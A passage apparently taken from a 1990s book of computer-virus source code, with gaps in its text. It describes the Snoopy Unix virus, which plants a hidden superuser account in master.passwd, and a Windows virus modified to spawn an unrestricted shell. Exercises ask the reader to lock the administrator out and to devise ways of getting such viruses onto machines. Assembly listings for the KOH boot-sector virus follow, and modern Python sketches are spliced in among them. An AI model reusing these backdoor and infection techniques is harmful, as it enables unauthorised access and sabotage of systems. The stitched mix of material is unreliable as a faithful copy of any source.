ever, is infected and Snoopy jumps into action.
Since root has access to master.passwd, Snoopy can success-
fully modify it, so it does, creating a new account called snoopy,
with the password “A Snoopy Dog.” and super user privileges. The
next time you log in, you log in as snoopy, not as guest, and bingo,
you have access to whatever you like.
Modifying master.passwd
Master.passwd is a plain text file which contains descriptions
of different accounts on the system, etc. The entries for the three
accounts we are discussing might look like this:
root:$1$UBFU030x$hFERJh7KYLQ6M5cd0hyxC1:0:0::0:0:Bourne-again Superuser:/root:
operator:$1$7vN9mbtvHLzSWcpN1:2:20::0:0:System operator:/usr/operator:/bin/csh
guest::5:32::0:0:System Guest:/usr/guest:/bin/csh
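Each of these records is ten colon-separated fields. Assuming the usual BSD field order (name, password hash, uid, gid, class, change, expire, gecos, home directory, shell), which the text here does not spell out, a record can be taken apart as in the following Python sketch. The names FIELDS, parse_record and superuser_names are hypothetical. The sketch reads the three sample records and lists the accounts whose uid is 0, since any such account has super user privileges regardless of its name.

```python
# Assumed BSD master.passwd field order; not stated in the text above.
FIELDS = ("name", "password", "uid", "gid", "class",
          "change", "expire", "gecos", "home", "shell")


def parse_record(line):
    """Split one master.passwd line into a dict keyed by field name."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(parts)))
    return dict(zip(FIELDS, parts))


def superuser_names(lines):
    """Return the names of all accounts whose uid is 0."""
    return [rec["name"] for rec in map(parse_record, lines) if rec["uid"] == "0"]


# The three sample records quoted in the text.
SAMPLE = [
    "root:$1$UBFU030x$hFERJh7KYLQ6M5cd0hyxC1:0:0::0:0:Bourne-again Superuser:/root:",
    "operator:$1$7vN9mbtvHLzSWcpN1:2:20::0:0:System operator:/usr/operator:/bin/csh",
    "guest::5:32::0:0:System Guest:/usr/guest:/bin/csh",
]

print(superuser_names(SAMPLE))
```

Note that an empty field is still a field: guest has an empty password and root an empty shell, so the line must be split on every colon rather than on runs of colons.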
To add snoopy, one need only add another line to this file:
snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:
Doing this is as simple as scanning the file for the snoopy record,
and if it’s not there, writing it out.
To actually take effect, master.passwd must be used to build a
password database, spwd.db. This is normally accomplished with
the pwd_mkdb program. Snoopy does not execute this program
itself (though it could—that’s left as an exercise for the reader).
Rather, the changes Snoopy makes will take effect the next time
the system administrator does some routine password maintenance
using, for example, the usual password file editor, vipw. At that
point the database will be rebuilt and the changes effected by
Snoopy will be activated.
Access Rights
To jump across accounts and directories on a Unix computer,
a virus must be careful about what access rights it gives to the
various files it infects. If not, it will cause obvious problems when
programs which used to be executable by a user cease to be without
apparent reason, etc.
In Unix, files can be marked with read, write and execute
attributes for the owner, for the group, and for other users, for a
total of nine attributes.
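To make the nine attributes concrete, here is a minimal sketch in Python (it is not part of the Snoopy source) that decodes a numeric file mode into its owner, group and other triples. The function name describe_mode is hypothetical; the bit constants come from Python's standard stat module.

```python
import stat

def describe_mode(mode):
    """Return the rwx triple for owner, group and other as short strings."""
    triples = {
        "owner": (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR),
        "group": (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP),
        "other": (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH),
    }
    result = {}
    for who, bits in triples.items():
        # Emit the letter when the bit is set, a dash when it is clear.
        result[who] = "".join(
            letter if mode & bit else "-" for letter, bit in zip("rwx", bits)
        )
    return result

if __name__ == "__main__":
    # 0o754: owner may do everything, group may read and execute, others may only read.
    print(describe_mode(0o754))
```

A mode of 0o777 sets all nine bits, which is the "maximally available" state for a file.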
Snoopy takes the easy route in handling these permission bits
by making all the files it touches maximally available. All read,
write and execute bits are set for both the virus and the host. This
strategy also has the effect of opening the system up, so that files
with restricted access become less restricted when infected.
Exercises
1. Add the code to rebuild the password database automatically, either by
executing the pwd_mkdb program or by calling the database functions
directly.
2. Once Snoopy has done its job, it makes sense for it to go away. Add a
routine which will delete every copy of it out of the current directory if
the passwd file already contains the snoopy user.
3. Modify Snoopy to also change the password for root so that the system
administrator will no longer be able to log in once the password database
is rebuilt.
Chapter 35
Adding Functionality to a Windows Program
Source Code for this Chapter: \YELT-S\YELTSIN.ASM
what one would call a secure operating system. None the less, its
install base is so huge, you can find it in all kinds of places being
used as if it were secure. For example, many schools and libraries
have computers linked to the internet using Windows 95 and the
Internet Explorer. They might have babysitter programs installed
to make sure you don’t access any politically incorrect web sites,
etc., or to make sure you don’t run any programs you shouldn’t run.
If you can get to a DOS prompt, you can shut down any
software you don’t want running and gain free rein on that
computer very easily. To get a DOS prompt, you need a
program that acts as a shell without any restrictions. There was quite
a ruckus a year or two ago when hackers discovered that Internet
Explorer has shell functionality which can be used to get a DOS
prompt. But what if you don’t have access to a shell?
Wouldn’t it be nice to have a virus that gave shell capabilities
to any program it infected? That would certainly compromise
security in a big way! In fact, modifying one of our 32-bit Windows
viruses to do this is incredibly easy.
Let’s take Yeltsin, and turn it into Yeltsin-S. The main infection
routine ends simply enough like this:
EXIT: add esp,WORKSP
popad ;get rid of temporary data area
HADDR: jmp HOST ;@ dynamically modified by virus
COMCOM db ’C:\COMMAND.COM’,0
down. If not, the virus just exits in the usual way, jumping to
EXIT2, which is identical to the original EXIT.
If, however, the Shift key is down, the virus next makes a call
to WinExec, which executes the program named at the label COMCOM.
That program is the DOS COMMAND.COM command
processor. It could be anything else you like, for example
PROGMAN.EXE, the Windows shell.
The only other thing needed to make this modification work is
to add the GetAsyncKeyState and WinExec function addresses to
the address tables in BASICS.INC so the virus knows where to call
these functions:
WIN_EXEC DD WINEXEC
GET_ASYNC_KEY_STATE DD GETASYNCKEYSTATE
and
WINEXEC EQU 0BFF9CFE8H ;@WinExec
GETASYNCKEYSTATE EQU 0BFF623B1H ;@GetAsyncKeyState
Exercises
1. Add a similar modification to Jadis. Be aware that WinExec is part of
KERNEL32, but GetAsyncKeyState is part of USER32.
3. Devise a way to insert a virus like this into a computer that has a floppy
disk drive.
4. Devise a way to insert a virus like this when you are a user accessing
the internet.
Chapter 36
KOH: A Good Virus
Source for this chapter: \KOH\KOH.ASM
Why a Virus?
Encrypting disks is, of course, something useful that many
people would like to do. The obvious question is, why should a
1 See Fred Cohen’s books, A Short Course on Computer Viruses, and It’s Alive! for
further discussion of this subject.
1. Virus Technology
If one wants to encrypt a whole disk, including the root direc-
tory, the FAT tables, and all the data, a boot sector virus would be
an ideal approach. It can load before even the operating system boot
sector (or master boot sector) gets a chance to load. No software
that works at the direction of the operating system can do that. In
order to load the operating system and, say, a device driver, at least
the root directory and the FAT must be left unencrypted, as well as
operating system files and the encrypting device driver itself.
Leaving these areas unencrypted is a potential security hole which
could be used to compromise data on the computer.
By using technology originally developed for boot sector vi-
ruses (e.g. the ability to go resident before DOS loads), the encryp-
tion mechanism lives beneath the operating system itself and is
completely transparent to this operating system. All of every sector
is encrypted without question in an efficient manner. If one’s
software doesn’t do that, it can be very hard to determine what the
security holes even are.
2. Self-Reproduction
The KOH program also acts like a virus in that—if you
choose—it will automatically encrypt and migrate to every floppy
disk you put in your computer to access. This feature provides an
important housekeeping function to keep your environment totally
secure. You never need to worry about whether or not a particular
disk is encrypted. If you’ve ever accessed it at all, it will be. Just
by normally using your computer, everything will be encrypted.
Furthermore, if you ever have to transport a floppy disk to
another computer, you don’t have to worry about taking the pro-
gram to decrypt with you. Since KOH is a virus, it puts itself on
anything in the remaining 507 bytes that are written. They may
contain part of a directory or part of another file that was recently
in memory.
So suppose you want to write a “safe” file to an unencrypted
floppy to share with someone. Just because that file doesn’t contain
anything you want to keep secret doesn’t mean that whatever was
in memory before it is similarly safe. And it could go right out to
disk with whatever you wanted to put there.
Though KOH doesn’t clean up these buffers, writing only
encrypted data to disk will at least keep the whole world from
looking at them. Only people with the floppy disk password could
snoop for this end-of-file-data. (To further reduce the probability
of someone looking at it, you should also clean up the file end with
something like CLEAN.ASM, listed in Figure 36.1.)
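The amount of leftover space at the end of a file is simple arithmetic. The sketch below is in Python rather than assembly and is only an illustration; the name slack_bytes is hypothetical. It computes how many bytes lie between the end of a file and the end of its last allocation unit, which is the region a program like CLEAN has to zero.

```python
def slack_bytes(file_size, unit_size):
    """Bytes between end-of-file and the end of the last sector or cluster."""
    if unit_size <= 0:
        raise ValueError("unit_size must be positive")
    remainder = file_size % unit_size
    # A file that ends exactly on a boundary leaves no slack at all.
    return 0 if remainder == 0 else unit_size - remainder

if __name__ == "__main__":
    # A 5-byte file in a 512-byte sector leaves 507 bytes of old buffer contents.
    print(slack_bytes(5, 512))
    # With 2048-byte clusters, a 1500-byte file leaves 548 bytes.
    print(slack_bytes(1500, 2048))
```

The same calculation works for either sectors or clusters; only the unit size changes.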
The Physical Disk
If one views a diskette as an analog device, it is possible to
retrieve data from it that has been erased. For this reason even a
so-called secure erase program which goes out and overwrites
clusters where data was stored is not secure. (And let’s not even
mention the DOS delete command, which only changes the first
letter of the file name to 0E5H and cleans up the FAT. All of the
data is still sitting right there on disk!)
There are two phenomena that come into play which prevent
secure erasure. One is simply the fact that in the end a floppy disk
is analog media. It has magnetic particles on it which are statisti-
cally aligned in one direction or the other when the drive head writes
to disk. The key word here is statistically. A write does not simply
align all particles in one direction or the other. It just aligns enough
that the state can be unambiguously interpreted by the analog-to-
digital circuitry in the disk drive.
For example, consider Figure 36.2. It depicts three different
“ones” read from a disk. Suppose A is a virgin 1, written to a disk
that never had anything written to it before. Then a one written over
a zero would give a signal more like B, and a one written over
another one might have signal C. All are interpreted as digital ones,
but they’re not all the same. With the proper analog equipment you
can see these differences (which are typically 40 dB weaker than
the existing signal) and read an already-erased disk. The same can
;CLEAN will clean up the “unused” data at the end of any file simply by
;calling it with “CLEAN FILENAME”.
.model tiny
.code
ORG 100H
CLEAN:
mov ah,9 ;welcome message
mov dx,OFFSET HIMSG
int 21H
xor al,al ;zero file buffer
mov di,OFFSET FBUF
mov cx,32768
rep stosb
mov bx,5CH
mov dl,[bx] ;drive # in dl, get FAT info
mov ah,1CH
push ds ;save ds as this call messes it up
int 21H
pop ds ;now al = sectors/cluster for this drive
cmp al,40H ;make sure cluster isn’t too large
jnc EX ;for this program to handle it (<32K)
xor ah,ah
mov cl,9
shl ax,cl ;ax = bytes/cluster now, up to 64K
mov [CSIZE],ax
mov ah,0FH ;open the file in read/write mode
mov dx,5CH
int 21H
mov bx,5CH
mov WORD PTR [bx+14],1 ;set record size
mov dx,[bx+18] ;get current file size
mov ax,[bx+16]
mov [bx+35],dx ;use it for random record number
mov [bx+33],ax
push dx ;save it for later
push ax
mov cx,[CSIZE] ;and divide it by cluster size
div cx ;cluster count in ax, remainder in dx
or dx,dx
jz C3
sub cx,dx ;bytes to write in cx
mov ah,1AH ;set DTA
mov dx,OFFSET FBUF
int 21H
mov dx,bx ;write to the file
mov ah,28H ;random block write of cx one-byte records
int 21H ;cx still holds the slack byte count computed above
C3: pop ax ;get original file size in dx:ax
pop dx
mov [bx+18],dx ;manually set file size to original value
mov [bx+16],ax
mov dx,bx
mov ah,10H ;now close file
int 21H
EX: mov ax,4C00H ;then exit to DOS
int 21H
HIMSG DB 'File End CLEANer, Version 2.0 (C) 1995 American Eagle Publica'
DB 'tions',0DH,0AH,'$'
CSIZE DW ? ;cluster size, in bytes
FBUF DB 32768 dup (?) ;zero buffer written to end of file
END CLEAN
be said of a twice-erased disk, etc. The signals just get a little weaker
each time.
The second phenomenon that comes into play is wobble. Not
every bit of data is written to disk in the same place, especially if
two different drives are used, or a disk is written over a long period
of time during which wear and tear on a drive changes its charac-
teristics. (See Figure 36.3) This phenomenon can make it possible
to read a disk even if it’s been overwritten a hundred times.
The best defense against this kind of attack is to see to it that
one never writes an unencrypted disk. If all the spy can pick up off
the disk using such techniques is encrypted data, it will do him little
good. The auto-encryption feature of KOH can help make that “never”
a reality.
Infecting Disks
KOH infects diskettes just like BBS. It replaces the boot sector
with its own, and hides the original boot sector with the rest of its
code in an unoccupied area on the disk. This area is protected by
marking the clusters it occupies as bad in the FAT. The one
difference is that KOH only infects floppies if the condition flag
FD_INFECT is set equal to 1 (true). If this byte is zero, KOH is
essentially dormant and does not infect disks. We’ll discuss this
more in a bit. For now, suffice it to say that FD_INFECT is
user-definable.
When KOH infects a floppy disk, it automatically encrypts it
using the current floppy disk pass phrase. Encryption always precedes
infection so that if the infection process fails (e.g. if the disk is
too full to put the virus code on it) it will still be encrypted and work
properly. Note that the virus is polite. It will not in any instance
destroy data.
Like BBS, KOH infects hard disks only at boot time. Unlike
BBS, when migrating to a hard disk, KOH is very polite and always
asks the user if he wants it to migrate to the hard disk. This is easily
accomplished in code by changing a simple call,
call INFECT_HARD
to something like
mov si,OFFSET HARD_ASK
call ASK
jnz SKIP_INF
call INFECT_HARD
SKIP_INF:
Encryption
KOH uses the International Data Encryption Algorithm
(IDEA) to encrypt and decrypt data.2 IDEA uses a 16-byte key to
encrypt and decrypt data 8 bytes at a time. KOH maintains three
separate 16-byte keys, HD_KEY, HD_HPP and FD_HPP.3
In addition to the 16-byte keys, IDEA accepts an 8-byte vector
called IV as input. Whenever this vector is changed, the output of
the algorithm changes. KOH uses this vector to change the encryption
from sector to sector. The first two words of IV are set to the
values of cx and dx needed to read the desired sector with INT 13H.
The last two words are not used.
2 This is the same algorithm that PGP uses internally to speed the RSA up.
3 “HPP” stands for “Hashed Pass Phrase”.
Since KOH is highly optimized to save space, the implemen-
tation of IDEA which it uses is rather convoluted and hard to follow.
Don’t be surprised if it doesn’t make sense, but you can test it
against a more standard version written in C to see that it does
indeed work.
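For comparison with the optimized listing, the key expansion can be sketched in a few lines of a higher-level language. The Python below follows the published IDEA key schedule, using the same rule that appears in the listing's comment, Z[I+7] = Z[I & 7]<<9 | Z[(I+1) & 7]>>7. It is a readable reference under that assumption, not a transcription of KOH's code, and the names idea_expand_key and idea_mul are hypothetical. idea_mul shows IDEA's multiplication modulo 65537, in which a zero word stands for 65536; the listing's _MUL routine presumably does the same job.

```python
def idea_expand_key(user_key):
    """Expand a 16-byte key into the 52 sixteen-bit encryption subkeys."""
    if len(user_key) != 16:
        raise ValueError("IDEA takes a 16-byte key")
    # The first 8 subkeys are the key itself, read as big-endian words.
    z = [int.from_bytes(user_key[i:i + 2], "big") for i in range(0, 16, 2)]
    base = 0  # start of the current group of 8 subkeys
    i = 0
    for _ in range(8, 52):
        i += 1
        lo = z[base + (i & 7)]
        hi = z[base + ((i + 1) & 7)]
        # Each new subkey is taken from the previous group rotated left 25 bits.
        z.append(((lo << 9) | (hi >> 7)) & 0xFFFF)
        base += i & 8  # move on to the next group after every 8 subkeys
        i &= 7
    return z

def idea_mul(a, b):
    """Multiply modulo 65537, treating 0 as 65536 on input and output."""
    a = a or 0x10000
    b = b or 0x10000
    return (a * b % 0x10001) & 0xFFFF

if __name__ == "__main__":
    subkeys = idea_expand_key(bytes(range(1, 17)))
    print(len(subkeys), [hex(k) for k in subkeys[:10]])
```

Comparing the 52 words produced by a reference like this against the _Z table built by INITKEY_IDEA for the same key is one way to carry out the test suggested above.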
Since a sector is 512 bytes long, one must apply IDEA 64 times,
once to each 8-byte block in the sector, to encrypt a whole sector.
When doing this, IDEA is used in what is called “cipher feedback”
mode. This is a secure mode to use, since it feeds the encrypted
data back into IV. This way, even if the sector is filled with a
constant value, the second 8-byte block of encrypted data will look
different from the first, and so on.
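The feedback idea is easier to see in a short sketch. The Python below is an illustration only: block_encrypt is a stand-in built from SHA-256, not IDEA, and all of the function names are hypothetical. It follows the pattern the IDEACRYPT routine in the listing appears to use, namely encrypt the vector, XOR the result into the next 8 bytes of the buffer, then copy those 8 encrypted bytes back into the vector. The layout of the per-sector vector (cx, dx, then two zero words, little-endian) is likewise an assumption.

```python
import hashlib
import struct

BLOCK = 8      # bytes per block, as IDEABLOCKSIZE in the listing
SECTOR = 512   # bytes per sector

def block_encrypt(key, block):
    """Stand-in for the block cipher: any keyed 8-byte to 8-byte function."""
    return hashlib.sha256(key + block).digest()[:BLOCK]

def sector_iv(cx, dx):
    """Build the 8-byte vector from the INT 13H cx and dx values (assumed layout)."""
    return struct.pack("<4H", cx, dx, 0, 0)

def feedback_encrypt(key, iv, data):
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        pad = block_encrypt(key, iv)
        chunk = bytes(a ^ b for a, b in zip(data[i:i + BLOCK], pad))
        out += chunk
        iv = chunk  # the encrypted block becomes the next vector
    return bytes(out)

def feedback_decrypt(key, iv, data):
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        pad = block_encrypt(key, iv)
        chunk = data[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(chunk, pad))
        iv = chunk  # feedback uses the encrypted block, same as when encrypting
    return bytes(out)

if __name__ == "__main__":
    key = b"k" * 16
    sector = bytes(SECTOR)  # a sector filled with a constant value
    enc = feedback_encrypt(key, sector_iv(1, 0x0080), sector)
    print(enc[:8].hex(), enc[8:16].hex())  # the two blocks differ
```

Because the vector starts out different for every sector, two sectors holding identical data also encrypt to different bytes.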
crypt a floppy when the pass phrase is changed. A new disk must
be put in the drive when the pass phrase is changed, because old
disks won’t be readable then. (Of course, it’s easy to change back
any time and you can start up with any pass phrases you like, as
well.)
Hard disks are a little more complex. Since they’re fixed,
changing the pass phrase would mean the disk would have to be
totally decrypted with the old pass phrase and then re-encrypted
with the new one. Such a process could take several hours. That
could be a problem if someone looked over your shoulder and
compromised your pass phrase. You may want to—and need
to—change it instantly to maintain the security of your computer,
not next Saturday when it’ll be free for six hours. Using a double
key HD_KEY and HD_HPP makes it possible to change pass phrases
very quickly. HD_KEY is a fixed key that never gets changed. That’s
what is built by pressing keys to generate a random number when
KOH is installed. This key is then stored along with FD_HPP in
one special sector. That special sector is kept secure by encrypting
it with HD_HPP. When one changes the hard disk pass phrase, only
HD_HPP is changed. Then KOH can just decrypt this one special
sector with the old HD_HPP, re-encrypt with the new HD_HPP, and
the pass phrase change is complete! Encrypting and decrypting one
sector is very fast—much faster than doing 10,000 or 50,000 sectors
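The double-key arrangement can be sketched as follows. This Python is an illustration under stated assumptions, not KOH's code. A fixed random disk key protects the data, and a key derived from the pass phrase protects only the small sector where the disk key is stored. The XOR keystream built from SHA-256 stands in for IDEA, and every name here is hypothetical.

```python
import hashlib

def keystream(key, length):
    """Stand-in cipher: a SHA-256 based keystream of the requested length."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "little")).digest()
        counter += 1
    return out[:length]

def xor_crypt(key, data):
    """Encrypt or decrypt (the operation is its own inverse)."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

def hash_pass_phrase(phrase):
    """Reduce a pass phrase to a 16-byte key (assumed hashing scheme)."""
    return hashlib.sha256(phrase.encode("utf-8")).digest()[:16]

def make_key_sector(disk_key, phrase):
    """Store the fixed disk key encrypted under the pass-phrase key."""
    return xor_crypt(hash_pass_phrase(phrase), disk_key)

def change_pass_phrase(key_sector, old_phrase, new_phrase):
    """Re-wrap the disk key; the bulk data on disk is never touched."""
    disk_key = xor_crypt(hash_pass_phrase(old_phrase), key_sector)
    return xor_crypt(hash_pass_phrase(new_phrase), disk_key)

if __name__ == "__main__":
    disk_key = bytes(range(16))  # would be random in practice
    sector = make_key_sector(disk_key, "old phrase")
    sector = change_pass_phrase(sector, "old phrase", "new phrase")
    print(xor_crypt(hash_pass_phrase("new phrase"), sector) == disk_key)
```

The point of the design is that the cost of a pass phrase change is one sector, however large the disk is.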
Ctrl-Alt-H: Uninstall
The KOH virus is so polite, it even cleans itself off your disk
if you want it to. It will first make sure you really want to uninstall.
[Figure: flowchart of the KOH INT 13H handler. Decision boxes: Read? Write? Format? Is it hard disk read? Is encrypted? Is it attempt to overwrite virus? Error on infect? Action boxes: change to local stack, turn FD infect off temporarily, infect floppy disk, encrypt data @ es:bx, do old INT 13H, decrypt data @ es:bx, restore stack, jump to old INT 13H, return to caller.]
If one agrees, KOH proceeds to decrypt the hard disk and remove
itself, restoring the original master boot sector.
Compatibility Questions
Because KOH has been available as freeware for some time,
users have provided lots of feedback regarding its compatibility
with various systems and software. That’s a big deal with systems
level software. As a result, KOH is probably one of the most
compatible viruses ever developed. Most just don’t get that kind of
critical testing from users.
KOH has been made available as freeware for nearly two years,
and it’s very compatible with a wide variety of computers. It works
well with all existing versions of DOS, Windows 3.X and Windows
Legal Warning
As of the date of this writing, the KOH virus with strong
cryptography (the IDEA module) is illegal to export in executable
or compilable form from the US. If you create an executable of it
from the code in this book, and export it, you could be subject to
immediate confiscation of all your property without recourse, and
possibly also to jail after a trial. There is, however, no restriction
(at present) against exporting this code in printed form.
Because of this, the KOH virus included on the Companion
Disk with this book uses a simple XOR-based encryption routine
that is trivial to crack. If you want the strong cryptography, you’ll
have to type in the KOHIDEA.ASM module listed in this chapter
and replace the KOHIDEA.ASM file on the disk (which is really
XOR encryption) with what you typed in, and then assemble
KOH.ASM.
There. That doesn’t break the law. Doesn’t it make you happy
to know that the US government is so sensible?
ROUNDS EQU 8
KEYLEN EQU 6*ROUNDS+4
IDEABLOCKSIZE EQU 8
_MUL ENDP
;PUBLIC PROCEDURE
;COMPUTE IDEA ENCRYPTION SUBKEYS Z
INITKEY_IDEA PROC NEAR
PUSH ES
PUSH DS
POP ES
MOV SI,[HPP]
MOV DI,OFFSET _USERKEY
PUSH DI
MOV CX,8
IILP: LODSW
XCHG AL,AH
STOSW
LOOP IILP
POP SI
MOV DI,OFFSET _Z
PUSH DI
MOV CL,8 ;CH=0 ON ENTRY ASSUMED
REP MOVSW
POP SI
XOR DI,DI ;I
MOV CH,8 ;J
SHLOOP:
INC DI ;I++
MOV BX,DI
SHL BX,1
PUSH BX
AND BX,14
ADD BX,SI
MOV AX,[BX] ;AX=Z[I & 7]
MOV BX,DI
INC BX
SHL BX,1
AND BX,14
ADD BX,SI
MOV DX,[BX] ;DX=Z[(I+1) & 7]
MOV CL,7
SHR DX,CL
MOV CL,9
SHL AX,CL
OR AX,DX
POP BX
ADD BX,SI
MOV [BX+14],AX ;Z[I+7] = Z[I & 7]<<9 | Z[(I+1) & 7]>>7
MOV AX,DI
SHL AX,1
AND AX,16
ADD SI,AX ;Z += I & 8;
AND DI,7
INC CH ;LOOP UNTIL COUNT = KEYLEN
CMP CH,KEYLEN
JC SHLOOP
POP ES
RETN
INITKEY_IDEA ENDP
MOV SI,OFFSET _Z
MOV DI,ROUNDS ;DI USED AS A COUNTER FOR DO LOOP
PUSH BX
PUSH CX
PUSH DX
PUSH AX
XOR BX,CX ;T2=X1^X3 (T2 IN BX)
LODSW
CALL _MUL ;T2=MUL(T2,*Z++) (T2 IN AX)
POP CX ;CX=X1
POP DX ;DX=X2
PUSH DX
PUSH CX
XOR DX,CX ;T1=X2^X4 (T1 IN DX)
ADD DX,AX ;T1+=T2
MOV BX,DX ;T1 IN BX
PUSH AX
LODSW
CALL _MUL ;T1=MUL(T1,*Z++)
POP BX ;T1 IN AX, T2 IN BX
ADD BX,AX ;T2+=T1
MOV BP,AX
POP AX
XOR AX,BX
POP DX
XOR BX,DX
POP CX
XOR CX,BP
POP DX
XOR DX,BP
PUSH AX
PUSH DX
PUSH BX
MOV BX,CX
LODSW
CALL _MUL
MOV CX,AX
POP BX
LODSW
ADD BX,AX
POP DX
LODSW
ADD DX,AX
POP AX
PUSH BX
MOV BX,AX
LODSW
PUSH CX
PUSH DX
CALL _MUL
MOV CX,AX
POP DX
POP AX
POP BX
POP BP
RETN
CIPHER_IDEA ENDP
;PUBLIC PROCEDURE
;VOID IDEASEC(BYTEPTR BUF); ENCRYPTS/DECRYPTS A 512 BYTE BUFFER
IDEASEC PROC NEAR
PUSH BP
MOV BP,SP
CMP BYTE PTR CS:[CFB_DC_IDEA],0
JNE IDEADECRYPT
JMP IDEACRYPT
IDEADECRYPT:
MOV BX,65 ;BX=COUNT
IS0: MOV AX,IDEABLOCKSIZE
POP ES
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
MOV SI,[BP+4]
MOV DI,OFFSET IV ;DI=IV
MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT
REP MOVSW ;DO *IV++=*BUF++ WHILE (--COUNT);
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
ISEX: POP BP
RETN 2
IDEACRYPT:
MOV SI,65 ;SI=COUNT
IS3: DEC SI ;CHUNKSIZE>0?
JZ ISEX ;NOPE, DONE
PUSH SI
PUSH ES
PUSH DS
POP ES ;DS=ES
MOV SI,OFFSET IV
LODSW
MOV CX,AX ;X1=*IN++
LODSW
MOV DX,AX ;X2=*IN++
LODSW
MOV BX,AX ;X3=*IN++
LODSW ;X4=*IN
CALL CIPHER_IDEA ;CIPHER_IDEA(IV_IDEA,TEMP,Z)
MOV DI,OFFSET _TEMP
STOSW
MOV AX,BX
STOSW
MOV AX,DX
STOSW
MOV AX,CX
STOSW
POP ES
MOV DI,[BP+4]
MOV CX,IDEABLOCKSIZE / 2
MOV SI,OFFSET _TEMP
XLOOP_: LODSW
XOR ES:[DI],AX
INC DI
INC DI
LOOP XLOOP_
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
MOV SI,[BP+4]
MOV DI,OFFSET IV ;DI=IV
MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT
REP MOVSW ;DO *IV++=*BUF++ WHILE (--COUNT);
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
POP SI
ADD WORD PTR [BP+4],IDEABLOCKSIZE ;BUF+=CHUNKSIZE
JMP IS3
IDEASEC ENDP
Exercises
1. We’ve discussed using KOH to prevent sensitive data from leaving the
workplace. If an employee knows the hot keys, though, he could still
get data out. Modify KOH to remove the interrupt 9 handler so this
cannot be done. You might design a separate program to modify the
hard disk pass phrase. This can be kept by the boss so only he can change
the pass phrase on an employee’s hard disk.
IBM offers a Developer’s Connection for OS/2 for about $295 per year (again, 4
quarterly updates on CD). It includes software development kits for OS/2, and
extensive documentation. A device driver kit is available for an extra $100. It
can be obtained by calling (800)-633-8266, or writing The Developer Connec-
tion, PO Box 1328, Internal Zip 1599, Boca Raton, FL 33429-1328.
Annabooks offers a complete BIOS package for the PC, which includes full
source. It is available for $995 from Annabooks, 11838 Bernardo Plaza Court,
San Diego, CA 92128, (619)673-0870 or (800)673-1432. Not cheap, but loads
cheaper than developing your own from scratch.
COM program file, definition 22
COM files, segment use 25
COM program with EXE header 56
companion virus, definition 39
computer virus, definition 15
computer virus, memory resident 63
computer virus, size 17
Computer Viruses, Artificial Life and
Evolution 366, 397
Concept virus 161
This book contains complete source code for live computer viruses
which could be extremely dangerous in the hands of incompetent
persons. You can be held legally liable for the misuse of these
viruses. Do not attempt to execute any of the code in this book
unless you are well versed in systems programming for personal
computers, and you are working on a carefully controlled and
isolated computer system. Do not put these viruses on any
computer without the owner's consent.
tools of choice for the information warriors of the 21st
century? Finally, you’ll learn about payloads for viruses,
not just destructive code, but also how to use a virus to
compromise the security of a computer, and the
possibility of beneficial viruses.
ISBN 0-929408-23-3 $39.95
Includes
Diskette!